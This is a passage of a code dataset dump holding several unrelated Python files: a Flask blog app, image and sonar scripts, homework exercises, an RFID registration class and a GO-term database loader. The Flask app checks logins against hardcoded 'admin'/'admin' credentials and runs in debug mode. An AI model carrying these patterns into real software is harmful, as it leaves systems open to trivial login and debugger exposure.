sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_dijk_seams.jpg\",10, energy = 'sobel', alg = 'dijk')\n\n#displays seams found by dynamic programming\n# im = sc_Image.from_filepath(\"images/giza.jpg\")\n# im.to_seam_pic(\"images/giza_dyn_seams.jpg\",10, energy = 'sobel', alg = 'dyn')","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":22409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"464084855","text":"from flask import Flask, render_template, request, redirect, url_for, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom functools import wraps\nimport sys\n\n#import sqlite3\n\napp = Flask(__name__)\n\n#config\nimport os\nimport config\n\napp.config.from_object(os.environ['APP_SETTINGS'])\n\n#create the sqlalchemy object\ndb = SQLAlchemy(app)\n\n#import models after creating SQLAlchemy object\nfrom models import *\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash('You need to login first.')\n return redirect(url_for('login'))\n return wrap\n\n@app.route('/')\n@login_required\ndef home():\n #return \"hello people\"\n posts = db.session.query(BlogPost).all()\n return render_template(\"index.html\", posts=posts)\n\n@app.route('/welcome')\ndef welcome():\n return render_template('welcome.html')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n error = 'Invalid credentials. please re-enter your details in the spaces provided'\n else:\n session['logged_in'] = True\n flash('You are now in the Grid!')\n return redirect(url_for('home'))\n return render_template('login.html', error=error)\n\n@app.route('/logout')\n@login_required\ndef logout():\n session.pop('logged_in', None)\n flash('May Tron grant you mercy as you leave!')\n return redirect(url_for('welcome'))\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376736095","text":"import cv2\nimport argparse\nimport glob\nfrom ampProc.amp_common import ampCommon\nimport numpy as np\n\ndef main(images):\n file = open(images, 'r')\n for fnames in file:\n optical = cv2.imread(fnames.split(',')[0])\n sonar = cv2.imread(fnames.split(',')[1].rstrip())\n cv2.imshow('optical', optical)\n cv2.imshow('sonar', sonar)\n cv2.waitKey(1)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Creation of co-registered \\\n videos from AMP optical/acoustic data\")\n parser.add_argument(\"--images_file\", help=\"Path to images text file\",\n default=\"data/co-registered_detections.txt\")\n\n args = parser.parse_args()\n\n\n main(args.images_file)\n","sub_path":"scripts/co-registered_video_creation2.py","file_name":"co-registered_video_creation2.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550351828","text":"# HW 04: Problem 02\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nt = 0\r\ndt = 6\r\nlamb = 0.735\r\nmark = ['o', 'v', '*', '+', 's']\r\n# Initial Condition\r\nx = [100, 0, 0, 0, 0, 50]\r\n# Boundary Condition\r\nxn = [100, 0, 0, 0, 0, 50]\r\n# Applying Condition\r\nfor m in range(5):\r\n for i in range(1, 5):\r\n xn[i] = (x[i] + (lamb * (x[i-1] - 2 * x[i] + x[i+1])))\r\n xp = xn\r\n print(xp)\r\n x_a = np.linspace(0, 10, 6)\r\n plt.plot(x_a, xp, marker=mark[m])\r\n x = xp\r\n xn = [100, 0, 0, 0, 0, 50]\r\n# Plotting\r\nplt.xlabel('Distance(m)') # X-Axis\r\nplt.ylabel('Temp degC') # Y-axis\r\nplt.title('Change of Temperature throughout the length')\r\nplt.legend(['6 sec','12 sec','18 sec','24 sec', '30 sec'])\r\nplt.grid('True')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109558625","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom database_models import Model_go_slim, Model_iprscan\nbase = declarative_base()\nengine = create_engine ( 'sqlite:////Users/burkej24/Desktop/potato_website/DM_6.1.db')\nbase.metadata.create_all ( engine )\nSession = sessionmaker ( engine )\nsession = Session ( )\n\ngo_dict = {}\nwith open(\"go_slim.txt\", \"r\") as go_in:\n go_in.readline()\n go_in.readline ( )\n go_in.readline ( )\n go_in.readline ( )\n for line in go_in:\n temp_dict = {}\n line = line.rstrip().split(\"\\t\")\n temp_dict[\"go_accession\"] = line[5]\n temp_dict[\"go_type\"] = line[7]\n temp_dict[\"go_name\"] = line[8]\n temp_dict[\"go_ev_code\"] = line[9]\n temp_dict[\"go_dbxref\"] = \"TAIR:\" + line[0]\n go_dict[line[5]] = temp_dict\nprint(\"dictionary created\")\n\nquery = session.query(Model_iprscan).filter(Model_iprscan.interpro_go != \"NA\")\nprint(len(query.all()))\nseen_dict = {}\ncount = 0\nfor item in query:\n seen_dict[str(item.transcript_id)] = []\nfor item in query:\n try:\n transcript_id = str(item.transcript_id)\n go_list = item.interpro_go.split(\"|\")\n for go in go_list:\n temp = go_dict[go]\n if temp[\"go_accession\"] in seen_dict[transcript_id]:\n continue\n else:\n model = Model_go_slim(transcript_id=transcript_id, go_accession=temp[\"go_accession\"], go_type=temp[\"go_type\"],\n go_name=temp[\"go_name\"], go_ev_code=temp[\"go_ev_code\"], go_dbxref=temp[\"go_dbxref\"], count = count)\n seen_dict[transcript_id].append(temp[\"go_accession\"])\n session.add ( model )\n count+=1\n\n except KeyError:\n print(\"error\")\nprint(count)\nsession.commit()","sub_path":"go_slim.py","file_name":"go_slim.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242012676","text":"fh = open(\"mbox-short.txt\")\n\nnew_dict = dict()\n\nfor line in fh:\n words = line.split()\n for word in words:\n new_dict[word] = new_dict.get(word,0)+1\n\n'''bigWord = None\nfor word, count in new_dict.items():\n if bigCount is None or count>bigCount:\n bigCount = count\n bigWord = word\n\nprint(bigCount)\nprint(bigWord)'''\n\nbigCount = None\nbigWord = None\nfor word, count in new_dict.items():\n if bigCount is None:\n bigCount = count\n elif count > bigCount:\n bigCount = count\n bigWord = word\nprint(bigCount,bigWord)\n\nsmallCount = None\nsmallWord = None\nfor word, count in new_dict.items():\n if smallCount is None:\n smallCount = count\n elif count < smallCount:\n smallCount = count\n smallWord = word\nprint(smallCount,smallWord)\n","sub_path":"basicones/finding_largest_word.py","file_name":"finding_largest_word.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560173066","text":"#!/usr/bin/python3\n\"\"\"Function that splits a text according to ., ?, and :\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"function that splits a string of text\n\n Arguments:\n text (str): the string of text to split\n \"\"\"\n\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n i = 0\n text = text.strip()\n\n while i < len(text):\n print(text[i], end='')\n if text[i] == '.' or text[i] == '?' or text[i] == ':':\n print('\\n')\n if i == len(text) - 1:\n break\n if text[i + 1] == ' ':\n i = i + 1\n while text[i] == ' ' and text[i + 1] == ' ':\n i = i + 1\n i = i + 1\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382725216","text":"def clock(time: str) -> str:\n\n if time.count(':') != 1 or time == ':' or time.startswith(':') or time.endswith(':'):\n print('[ERROR] Invalid syntax of Time.')\n exit()\n else:\n x = time.replace(':', '', 1)\n if not x.isdecimal():\n print('[ERROR] Invalid syntax.\\nEnter only numbers, please! (e. g. 05:45)')\n exit()\n else:\n hour, minute = time.split(':')\n hour = int(hour)\n minute = int(minute)\n\n if not hour in range(1, 13) and minute > 59:\n print('Wrong form of hour and minute')\n exit()\n if not hour in range(1, 13):\n print('Wrong form of hour.\\nHours can be in range 01 to 12.')\n exit()\n elif minute > 59:\n print('Wrong form of minute.\\nMinutes can be in range 00 to 59.')\n exit()\n\n if hour == 12 and minute == 0: # Defining specific hour: (12:00)\n print('12:00')\n exit()\n\n if hour > 10 and minute != 0: # Defining the Mirror Time\n mirror_hour = 23 - hour\n\n elif hour < 11 and minute != 0:\n mirror_hour = 11 - hour\n\n\n if minute != 0: # Defining the Mirror Minute\n mirror_minute = 60 - minute\n else:\n mirror_hour = 12 - hour\n mirror_minute = minute\n\n if mirror_hour < 10: # Formation of Output\n mirror_hour = '{}{}'.format(0, mirror_hour)\n\n if mirror_minute < 10:\n mirror_minute = '{}{}'.format(0, mirror_minute)\n\n a = '{}{}{}'.format(mirror_hour, ':', mirror_minute)\n\n return a\n\n\n\n","sub_path":"Hayk_homework_4 (Mirror Clock).py","file_name":"Hayk_homework_4 (Mirror Clock).py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595332082","text":"# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries\n# SPDX-License-Identifier: MIT\n\n# import board\n# import busio\n# from digitalio import DigitalInOut\n# from adafruit_pn532.spi import PN532_SPI\nimport pandas as pd\n\n\nclass RFIDNoHardware:\n\n def __init__(self):\n # SPI connection:\n # self.spi = busio.SPI(board.SCK, board.MOSI, board.MISO)\n # self.cs_pin = DigitalInOut(board.D5)\n # self.pn532 = PN532_SPI(self.spi, self.cs_pin, debug=False)\n # self.ic, self.ver, self.rev, self.support = self.pn532.firmware_version\n\n # Configure PN532 to communicate with MiFare cards\n # self.pn532.SAM_configuration()\n\n # NOTE: enter the exact path for your machine to run locally\n # self.file_path = \"/home/pi/Documents/CS179J-Smart-Water-Station/data/user_data.csv\"\n self.file_path = \"/home/chris/PycharmProjects/CS179J-Smart-Water-Station/data/user_data.csv\"\n self.uid = ''\n\n # def output_uid(self):\n # print(\"Waiting for RFID/NFC card...\")\n # while True:\n # # Check if a card is available to read\n # self.uid = self.pn532.read_passive_target(timeout=0.5)\n # print(\".\", end=\"\")\n # # Try again if no card is available.\n # if self.uid is None:\n # continue\n # print(\"Found card with UID:\", [hex(i) for i in self.uid])\n\n def set_uid(self, uid):\n self.uid = uid\n\n def get_uid(self):\n return self.uid\n\n # def scan_card(self):\n # self.uid = None\n #\n # while self.uid is None:\n # self.uid = self.pn532.read_passive_target(timeout=0.5)\n #\n # uid = [hex(i) for i in self.uid]\n # self.uid = ''\n #\n # for string in uid:\n # self.uid += string[2:]\n\n def register_card(self, the_uid):\n df = pd.read_csv(self.file_path)\n\n index = df.index[df['card_uid'] == the_uid].tolist()\n\n card_state = df.at[index[0], 'registration_state']\n\n if not card_state:\n df.at[index[0], 'registration_state'] = True\n df.to_csv(self.file_path, index=False)\n\n def unregister_card(self, the_uid):\n self.uid = ''\n\n df = pd.read_csv(self.file_path)\n\n index = df.index[df['card_uid'] == the_uid].tolist()\n\n card_state = df.at[index[0], 'registration_state']\n\n if card_state:\n df.at[index[0], 'registration_state'] = False\n df.to_csv(self.file_path, index=False)\n\n def check_registration(self, the_uid):\n df = pd.read_csv(self.file_path)\n\n index = df.index[df['card_uid'] == the_uid].tolist()\n\n if len(index) != 0:\n card_state = df.at[index[0], 'registration_state']\n else:\n card_state = False\n\n return card_state\n\n\nif __name__ == '__main__':\n rfid = RFIDNoHardware()\n","sub_path":"rfid/rfid_no_hardware.py","file_name":"rfid_no_hardware.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"431010782","text":"def Cantor():\r\n\tparameters = raw_input()\r\n\tk = int(parameters.split()[0])\r\n\tc = int(parameters.split()[1])\r\n\ts = int(parameters.split()[2])\r\n\tscheduledCleaning = \"\"\r\n\tif (k / c) <= s:\r\n\t\tsectionsToCheck = range(k)\r\n\t\tcurrentCheck = 0\r\n\t\twhile currentCheck < len(sectionsToCheck):\r\n\t\t\tspot = 1\r\n\t\t\tif currentCheck + c <= sectionsToCheck:\r\n\t\t\t\ttoDo = sectionsToCheck[currentCheck:currentCheck + c]\r\n\t\t\t\tcurrentCheck += c\r\n\t\t\telse:\r\n\t\t\t\ttoDo = sectionsToCheck\r\n\t\t\t\tcurrentCheck = len(sectionsToCheck)\r\n\r\n\t\t\tfor depth in reversed(range(len(toDo))):\r\n\t\t\t\tspot = spot + (k**depth) * toDo[depth]\r\n\t\t\tscheduledCleaning = scheduledCleaning + \" \" + str(spot)\r\n\t\treturn scheduledCleaning\r\n\r\n\telse:\r\n\t\treturn \"IMPOSSIBLE\"\r\n\r\ntimes = input()\r\n\r\nfor x in range(times):\r\n print (\"Case #\" + str(x+1) + \":\" + str(Cantor()))","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_MuCephei_D.py","file_name":"16_0_4_MuCephei_D.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345035319","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/lucio/Projects/django-custard/custard/custard/conf.py\n# Compiled at: 2015-04-01 03:54:55\nfrom __future__ import unicode_literals\nimport sys\nfrom django.conf import settings as django_settings\nfrom django.utils.functional import cached_property as settings_property\nif b'test' in sys.argv:\n settings_property = property\nCUSTOM_TYPE_TEXT = b'text'\nCUSTOM_TYPE_INTEGER = b'integer'\nCUSTOM_TYPE_FLOAT = b'float'\nCUSTOM_TYPE_TIME = b'time'\nCUSTOM_TYPE_DATE = b'date'\nCUSTOM_TYPE_DATETIME = b'datetime'\nCUSTOM_TYPE_BOOLEAN = b'boolean'\n\nclass LazySettingsDict(object):\n\n @settings_property\n def CUSTOM_CONTENT_TYPES(self):\n return getattr(django_settings, b'CUSTOM_CONTENT_TYPES', None)\n\n @settings_property\n def CUSTOM_FIELD_TYPES(self):\n return dict({CUSTOM_TYPE_TEXT: b'django.forms.fields.CharField', \n CUSTOM_TYPE_INTEGER: b'django.forms.fields.IntegerField', \n CUSTOM_TYPE_FLOAT: b'django.forms.fields.FloatField', \n CUSTOM_TYPE_TIME: b'django.forms.fields.TimeField', \n CUSTOM_TYPE_DATE: b'django.forms.fields.DateField', \n CUSTOM_TYPE_DATETIME: b'django.forms.fields.DateTimeField', \n CUSTOM_TYPE_BOOLEAN: b'django.forms.fields.BooleanField'}, **getattr(django_settings, b'CUSTOM_FIELD_TYPES', {}))\n\n @settings_property\n def CUSTOM_WIDGET_TYPES(self):\n return dict({CUSTOM_TYPE_TEXT: b'django.contrib.admin.widgets.AdminTextInputWidget', \n CUSTOM_TYPE_INTEGER: b'django.contrib.admin.widgets.AdminIntegerFieldWidget', \n CUSTOM_TYPE_FLOAT: b'django.contrib.admin.widgets.AdminIntegerFieldWidget', \n CUSTOM_TYPE_TIME: b'django.contrib.admin.widgets.AdminTimeWidget', \n CUSTOM_TYPE_DATE: b'django.contrib.admin.widgets.AdminDateWidget', \n CUSTOM_TYPE_DATETIME: b'django.contrib.admin.widgets.AdminSplitDateTime', \n CUSTOM_TYPE_BOOLEAN: b'django.forms.widgets.CheckboxInput'}, **getattr(django_settings, b'CUSTOM_WIDGET_TYPES', {}))\n\n\nsettings = LazySettingsDict()","sub_path":"pycfiles/django-custard-0.10.tar/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354188032","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Copyright 2012 F2E.im\n# Do have a faith in what you're doing.\n# Make your life a story worth telling.\n\n# cat /etc/mime.types\n# application/octet-stream crx\nfrom __future__ import print_function\nimport sys\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\nimport os.path\nimport memcache\nimport torndb\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nimport handler.base\nimport handler.user\nimport handler.topic\nimport handler.page\nimport handler.notification\n\nfrom tornado.options import options\nfrom lib.loader import Loader\nfrom lib.session import SessionManager\nfrom jinja2 import Environment, FileSystemLoader\nimport tcelery\n\nimport settings\n\ndb_default = settings.DATABASE['default']\n# define(\"port\", default=settings.http['port'], help=\"run on the given port\", type=int)\n# define(\"mysql_host\", default=db_default['host'], help=\"community database host\")\n# define(\"mysql_database\", default=db_default['db_name'], help=\"community database name\")\n# define(\"mysql_user\", default=db_default['user'], help=\"community database user\")\n# define(\"mysql_password\", default=db_default['password'], help=\"community database password\")\n\n\ntcelery.setup_nonblocking_producer()\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n app_settings = dict(\n blog_title=settings.site['title'],\n login_url=\"/login\",\n jinja2=Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), \"templates\")),\n trim_blocks=True),\n reserved=[\"user\", \"topic\", \"home\", \"setting\", \"forgot\", \"login\", \"logout\", \"register\", \"admin\"],\n )\n app_settings.update(settings.app_settings)\n\n handlers = [\n (r\"/\", handler.topic.IndexHandler),\n (r\"/t/(\\d+)\", handler.topic.ViewHandler),\n (r\"/t/create/(.*)\", handler.topic.CreateHandler),\n (r\"/t/edit/(.*)\", handler.topic.EditHandler),\n (r\"/reply/edit/(.*)\", handler.topic.ReplyEditHandler),\n (r\"/node/(.*)\", handler.topic.NodeTopicsHandler),\n (r\"/u/(.*)/topics\", handler.topic.UserTopicsHandler),\n (r\"/u/(.*)/replies\", handler.topic.UserRepliesHandler),\n (r\"/u/(.*)/favorites\", handler.topic.UserFavoritesHandler),\n (r\"/u/(.*)\", handler.topic.ProfileHandler),\n (r\"/vote\", handler.topic.VoteHandler),\n (r\"/favorite\", handler.topic.FavoriteHandler),\n (r\"/unfavorite\", handler.topic.CancelFavoriteHandler),\n (r\"/notifications\", handler.notification.ListHandler),\n (r\"/members\", handler.topic.MembersHandler),\n (r\"/setting\", handler.user.SettingHandler),\n (r\"/setting/avatar\", handler.user.SettingAvatarHandler),\n (r\"/setting/avatar/gravatar\", handler.user.SettingAvatarFromGravatarHandler),\n (r\"/setting/password\", handler.user.SettingPasswordHandler),\n (r\"/forgot\", handler.user.ForgotPasswordHandler),\n (r\"/login\", handler.user.LoginHandler),\n (r\"/logout\", handler.user.LogoutHandler),\n (r\"/register\", handler.user.RegisterHandler),\n\n (r'/admin/user$', handler.user.UserAdminHandler),\n (r'/admin/node$', handler.topic.NodeAdminHandler),\n (r'/admin/node/new$', handler.topic.NodeEditHandler),\n (r'/admin/node/(\\d+)$', handler.topic.NodeEditHandler),\n (r'/admin/plane$', handler.topic.PlaneAdminHandler),\n (r'/admin/plane/new$', handler.topic.PlaneEditHandler),\n (r'/admin/plane/(\\d+)$', handler.topic.PlaneEditHandler),\n\n (r'/resource/picture/upload_async', handler.page.PictureIframeUploadHandler),\n\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(sitemap.*$)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(bdsitemap\\.txt)\", tornado.web.StaticFileHandler, dict(path=app_settings[\"static_path\"])),\n (r\"/(.*)\", handler.topic.ProfileHandler),\n ]\n\n tornado.web.Application.__init__(self, handlers, **app_settings)\n\n # Have one global connection to the blog DB across all handlers\n self.db = torndb.Connection(\n host=db_default['host'], database=db_default['db_name'],\n user=db_default['user'], password=db_default['password']\n )\n\n # Have one global loader for loading models and handles\n self.loader = Loader(self.db)\n\n # Have one global model for db query\n self.user_model = self.loader.use(\"user.model\")\n self.topic_model = self.loader.use(\"topic.model\")\n self.reply_model = self.loader.use(\"reply.model\")\n self.plane_model = self.loader.use(\"plane.model\")\n self.node_model = self.loader.use(\"node.model\")\n self.notification_model = self.loader.use(\"notification.model\")\n self.vote_model = self.loader.use(\"vote.model\")\n self.favorite_model = self.loader.use(\"favorite.model\")\n self.picture_model = self.loader.use('picture.model')\n\n # Have one global session controller\n self.session_manager = SessionManager(app_settings[\"cookie_secret\"], settings.memcached, 0)\n\n # Have one global memcache controller\n self.mc = memcache.Client(settings.memcached)\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n port = settings.http['port']\n http_server.listen(port)\n print(\"http listen at http://localhost:%d\" % port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405376406","text":"#to import this enum, do:\n# from enum.card import CARD\n#This will allow you to do CARD.\n\nclass CARD:\n\tUTURN = 0\n\tROTATE_RIGHT = 1\n\tROTATE_LEFT = 2\n\tBACKUP = 3\n\tMOVE_1 = 4\n\tMOVE_2 = 5\n\tMOVE_3 = 6\n","sub_path":"enum/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326302817","text":"import math\nimport pickle\nfrom utils import *\n\nsaved = 'saved_transitions'\n\ndef initialize_counts():\n lookup_counts = {'':{}}\n\n # state is given by the last two characters of the string\n\n for c1 in alphabet:\n lookup_counts[''][''+c1] = 1.0\n for c1 in alphabet:\n lookup_counts[c1] = {}\n for c2 in alphabet:\n lookup_counts[c1][c1+c2] = 1.0\n for c1 in alphabet:\n for c2 in alphabet:\n lookup_counts[c1+c2] = {}\n for c3 in alphabet:\n lookup_counts[c1+c2][c2+c3] = 1.0\n \n return lookup_counts\n\n\ndef contribute_corpus(lookup_counts, s):\n\n corpus = prepare(s)\n\n # populate probabilities of each character\n\n for c in corpus:\n lookup_counts[''][''+c] += 1.0\n\n #populate probabilities of each bigram\n\n for i in range(len(corpus)-1):\n lookup_counts[corpus[i]][corpus[i:i+2]] += 1.0\n\n \n #populate probabilities of trigrams\n \n for i in range(len(corpus)-2):\n lookup_counts[corpus[i:i+2]][corpus[i+1:i+3]] += 1.0\n \n return lookup_counts\n\n\ndef normalize_transitions(lookup_counts):\n # normalize unigram probabilities\n running_sum = 0.0\n for c1 in alphabet:\n running_sum += lookup_counts[''][''+c1]\n for c1 in alphabet:\n lookup_counts[''][''+c1] = math.log(lookup_counts[''][''+c1] / running_sum)\n\n # normalize bigrams\n for c1 in alphabet:\n running_sum = 0.0\n for c2 in alphabet:\n running_sum += lookup_counts[c1][c1+c2]\n for c2 in alphabet:\n lookup_counts[c1][c1+c2] = math.log(lookup_counts[c1][c1+c2] / running_sum)\n \n # normalize trigrams\n \n for c1 in alphabet:\n for c2 in alphabet:\n running_sum = 0.0\n for c3 in alphabet:\n running_sum += lookup_counts[c1+c2][c2+c3]\n for c3 in alphabet:\n lookup_counts[c1+c2][c2+c3] = math.log(lookup_counts[c1+c2][c2+c3]/ running_sum)\n \n return lookup_counts\n\n\ndef import_corpus(f):\n fin = open(f, 'r')\n\n transitions = initialize_counts()\n for line in fin:\n contribute_corpus(transitions, line)\n \n normalize_transitions(transitions)\n return transitions\n\n\n\ndef score2(s, transitions):\n text = prepare(s)\n \n score = 0.0\n if len(text) < 1:\n return score\n state = ''\n score += transitions[state][state + text[0]]\n if len(text) < 2:\n return score\n state = text[0]\n score += transitions[state][state + text[1]]\n if len(text) < 3:\n return score\n state = text[:2]\n\n for i in range(2, len(text)):\n score += transitions[state][(state+text[i])[1:]] \n state = (state+text[i])[1:]\n \n return score - math.log(1.0/len(alphabet)) * len(text)\n\n\n\nfin = open(saved, 'r')\nq = pickle.load(fin)\nfin.close()\n\ndef score(s):\n return score2(s,q)\n","sub_path":"scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494298069","text":"from io import StringIO\nfrom functools import reduce\nimport psycopg2 as psyco # pg driver\nimport psycopg2.extras\nfrom ..helpers.exceptions import NoBatchTypeException\nfrom ..helpers.pointmodel import Point_Model\n\n\nclass Uploader:\n \"\"\"\n The base class for other uploaders. The subclasses should essentially just implement the\n specific parser. This class initalizes the point model and interacts with the database.\n \"\"\"\n\n def __init__(self, dsn_string, batch_type_name):\n \"\"\"\n initalizes values and point_model\n :input:\n - dsn_string\n - the name of the batch_type the point_model is to be based off\n (should match the name of a type in the database)\n \"\"\"\n\n self.dsn_string = dsn_string\n self.batch_type_name = batch_type_name\n self.points = []\n self.set_ref_table_and_fields()\n\n def upload(self, file_ids):\n \"\"\"\n Makes a new batch and uploads all of the points. Also connects files to batchself.\n Returns the new batch_id\n :input: a list of file_ids used in the batch\n :output: int - id of batch\n \"\"\"\n\n conn = psyco.connect(dsn=self.dsn_string)\n cur = conn.cursor()\n\n batch_id = self.insert_batch(cur)\n self.link_files_to_batch(cur, batch_id, file_ids)\n\n copy_file, header = self.make_csv(batch_id)\n cur.copy_from(copy_file, self.ref_table, columns=header)\n\n conn.commit()\n cur.close()\n conn.close()\n\n return batch_id\n\n def parse_file(self, file):\n \"\"\"\n Takes a file and makes corresponding points and then gets the ranges of time and lat/lon.\n The parsing should be done in the subclasses and then super() should be used\n \"\"\"\n\n self.set_time_range_and_bbox()\n\n def insert_batch(self, cur):\n \"\"\"\n Inserts a new batch into the database, returns batch_id. Can only be run after parsing.\n :input: cursor\n \"\"\"\n\n bbox_string = \"ST_GeomFromText('POLYGON(({min_lon} {min_lat},{max_lon} {min_lat},{max_lon} {max_lat},{min_lon} {max_lat}, {min_lon} {min_lat}))', 4326)\"\n bbox_string = bbox_string.format(min_lon=self.min_lon,max_lon=self.max_lon,min_lat=self.min_lat,max_lat=self.max_lat)\n\n insert_batch_string = \"\"\"\n INSERT INTO Batches (start_time, end_time, batch_type_id, bbox)\n VALUES (%s, %s, %s, {}) RETURNING id;\n \"\"\".format(bbox_string)\n\n cur.execute(insert_batch_string, [self.start_time, self.end_time, self.batch_type_id])\n batch_id = cur.fetchone()[0]\n return batch_id\n\n\n def add_point(self, point):\n \"\"\"\n Stores the point, also validates\n :input: a point dict\n \"\"\"\n if self.point_model.validate(point):\n self.points.append(point)\n\n def link_files_to_batch(self, cur, batch_id, file_ids):\n \"\"\"\n adds (batch_id, file_id) to batch_files for every file_id in file_ids\n :input: cursor, batch_id, iterable of file ids\n \"\"\"\n insert_tuples = map(lambda x: (batch_id, x), file_ids)\n insert_string = \"INSERT INTO Batch_Files (batch_id, file_id) VALUES %s\"\n psycopg2.extras.execute_values(cur, insert_string, insert_tuples)\n\n def set_ref_table_and_fields(self):\n \"\"\"\n using the batch_type_name set the ref_table and point_model based off the database\n \"\"\"\n conn = psyco.connect(dsn=self.dsn_string)\n cur = conn.cursor()\n\n cur.execute('SELECT id, ref_table from batch_types where name = %s', (self.batch_type_name,))\n\n result = cur.fetchone()\n if result is None:\n raise NoBatchTypeException(\"There is no batch type with name '%s'\" % self.batch_type_name)\n self.batch_type_id, self.ref_table = result\n\n cur.execute('SELECT field_name, field_type from batch_type_fields f, batch_types b where b.id = %s and b.id = f.batch_type_id', (self.batch_type_id,))\n fields = cur.fetchall()\n self.point_model = Point_Model(fields)\n\n conn.commit()\n cur.close()\n conn.close()\n\n def set_time_range_and_bbox(self):\n \"\"\"\n Runs through all the points and finds the min and max of time, latitude and longitude\n Adds those vars to self. min_lon, max_lat, min_time, etc\n \"\"\"\n def update_ranges(current, new):\n for key in current:\n val = current[key]\n if val is None:\n current[key] = [new[key], new[key]]\n else:\n current[key] = [min(current[key][0], new[key]), max(current[key][1], new[key])]\n return current\n\n ranges = { 'time':None, 'latitude':None, 'longitude':None }\n extremes = reduce(update_ranges, self.points, ranges)\n\n self.start_time, self.end_time = extremes['time']\n self.start_time, self.end_time = extremes['time']\n self.min_lat, self.max_lat = extremes['latitude']\n self.min_lon, self.max_lon = extremes['longitude']\n\n def make_csv(self, batch_id):\n \"\"\"\n Makes a file-like object in tab-delimited CSV format without headers.\n Every point gets turned into a line.\n Returns a StringIO object and a list of strings representing the header.\n Any tabs in the values are replaced with spaces.\n :input: the batch_id\n :output: StringIO object in csv format, list of strings for header\n \"\"\"\n fields = list(self.point_model.model)\n\n # remove all the fields that start with 'pr_' from points\n trimmed_points = map(lambda p: {f:p[f] for f in p if not f.startswith('pr_')}, self.points)\n\n copy_file = StringIO()\n for p in trimmed_points:\n # makes the line replacing any existing \\t with spaces\n s = '\\t'.join([str(p[f]).replace('\\t', ' ') for f in fields] + [str(batch_id)])\n print(s, file=copy_file)\n\n copy_file.seek(0)\n\n header = fields + ['batch_id']\n\n return copy_file, header\n","sub_path":"dbinterfacer/uploaders/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"480106700","text":"try:\n import cupy as cp\nexcept ModuleNotFoundError:\n cp = None\n\nfrom analysis.config import get_analysis_config\n\ndef get_class_from_frame(frame):\n try:\n class_name = frame.f_locals[\"self\"].__class__.__name__\n except KeyError:\n class_name = \"Err: not an object\"\n return class_name\n\n\ndef get_object_wrapper_name(frame, event, args) -> str:\n return 